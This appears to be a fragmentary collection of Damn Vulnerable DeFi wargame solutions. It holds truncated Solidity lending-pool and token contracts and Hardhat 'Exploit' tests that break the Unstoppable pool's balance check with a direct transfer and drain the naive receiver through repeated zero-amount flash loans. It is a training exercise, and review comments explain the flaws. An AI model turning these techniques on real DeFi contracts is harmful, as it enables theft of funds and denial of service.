| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "../unstoppable/UnstoppableLender.sol"; | |
| import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
| contract ReceiverUnstoppable { | |
| UnstoppableLender private immutable pool; | |
| address private immutable owner; |
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import '@openzeppelin/contracts/token/ERC20/IERC20.sol'; | |
| import '@openzeppelin/contracts/security/ReentrancyGuard.sol'; | |
/// @title IReceiver
/// @notice Callback surface with a single entry point, `receiveTokens`.
/// @dev NOTE(review): presumably the lending pool calls this on the borrower during a
/// flash loan; the pool contract is not part of this excerpt, so confirm against it.
/// The function is `external`, so an implementing contract should verify that the
/// caller is the pool it trusts before it moves any tokens.
interface IReceiver {
    /// @param tokenAddress Address passed in for the token involved in the call.
    /// @param amount Token amount passed in by the caller.
    function receiveTokens(
        address tokenAddress,
        uint256 amount
    ) external;
}
it('Exploit', async function () {
    // One token unit is sent to the pool with a plain ERC20 transfer from the attacker
    // account, i.e. not through any function of the pool itself. The test then prints
    // the token contract's view of the pool balance next to the pool's own
    // poolBalance() figure; it only logs the two values and asserts nothing.
    // NOTE(review): presumably the lender compares these two numbers before lending,
    // so an unsolicited transfer leaves them permanently out of step; confirm against
    // the lender contract. A lender should not treat its internal accounting equalling
    // balanceOf(pool) as an invariant, because anyone can raise the latter.
    const poolAddress = this.pool.address
    await this.token.connect(attacker).transfer(poolAddress, 1)

    const tokenSideBalance = await this.token.balanceOf(poolAddress)
    console.log(' POOL BALANCE', String(tokenSideBalance))

    const trackedBalance = await this.pool.poolBalance()
    console.log('BALANCE BEFORE', String(trackedBalance))
})
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/ERC20.sol"; | |
| contract DamnValuableToken is ERC20 { | |
| // Decimals are set to 18 by default in `ERC20` | |
/// @notice Creates the token with the name "DamnValuableToken" and the symbol "DVT".
/// @dev The largest uint256 value is minted to the deployer in a single call, so the
/// deploying account starts out holding the entire supply.
constructor() ERC20("DamnValuableToken", "DVT") {
    uint256 entireSupply = type(uint256).max;
    _mint(msg.sender, entireSupply);
}
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| contract NaiveReceiverLenderPool is ReentrancyGuard { | |
| using Address for address; | |
| uint256 private constant FIXED_FEE = 1 ether; // not the cheapest flash loan |
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| contract FlashLoanReceiver { | |
| using Address for address payable; | |
| address payable private pool; |
| it('Exploit', async function () { | |
| /** CODE YOUR EXPLOIT HERE */ | |
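// Ten flash loans of amount 0 are requested from the attacker account, each naming the
// receiver contract as the borrower; the receiver's ETH balance is printed after each.
// NOTE(review): presumably every call charges the pool's fixed fee to the receiver even
// though the receiver never asked for the loan; confirm against the pool and receiver
// contracts. The defensive fix is for the pool to require that the caller is the
// borrower, or for the receiver to check who initiated the loan before paying the fee.
// The counter is declared with `let` so it stays local to the loop instead of becoming
// an implicit global (a ReferenceError in strict mode).
for (let i = 1; i <= 10; i++) {
    await this.pool.connect(attacker).flashLoan(this.receiver.address, 0)
    const receiverBalance = await ethers.provider.getBalance(this.receiver.address)
    console.log(i, String(receiverBalance))
}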
| } |
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "../naive-receiver/NaiveReceiverLenderPool.sol"; | |
| contract NaiveAttacker { | |
| NaiveReceiverLenderPool public pool; | |
| constructor(address payable _pool) { | |
| pool = NaiveReceiverLenderPool(_pool); |
| it('Exploit', async function () { | |
| /** CODE YOUR EXPLOIT HERE */ | |
| // Deploy attacker contract | |
| const NaiveAttacker = await ethers.getContractFactory('NaiveAttacker', attacker) | |
| this.attackerContract = await NaiveAttacker.deploy(this.pool.address) | |
| // Attack | |
| console.log( | |
| 'Receiver balance before attacking: ', | |
| String(await ethers.provider.getBalance(this.receiver.address)) |
| // SPDX-License-Identifier: MIT | |
| pragma solidity ^0.8.0; | |
| import "@openzeppelin/contracts/token/ERC20/IERC20.sol"; | |
| import "@openzeppelin/contracts/utils/Address.sol"; | |
| import "@openzeppelin/contracts/security/ReentrancyGuard.sol"; | |
| contract TrusterLenderPool is ReentrancyGuard { | |
| using Address for address; |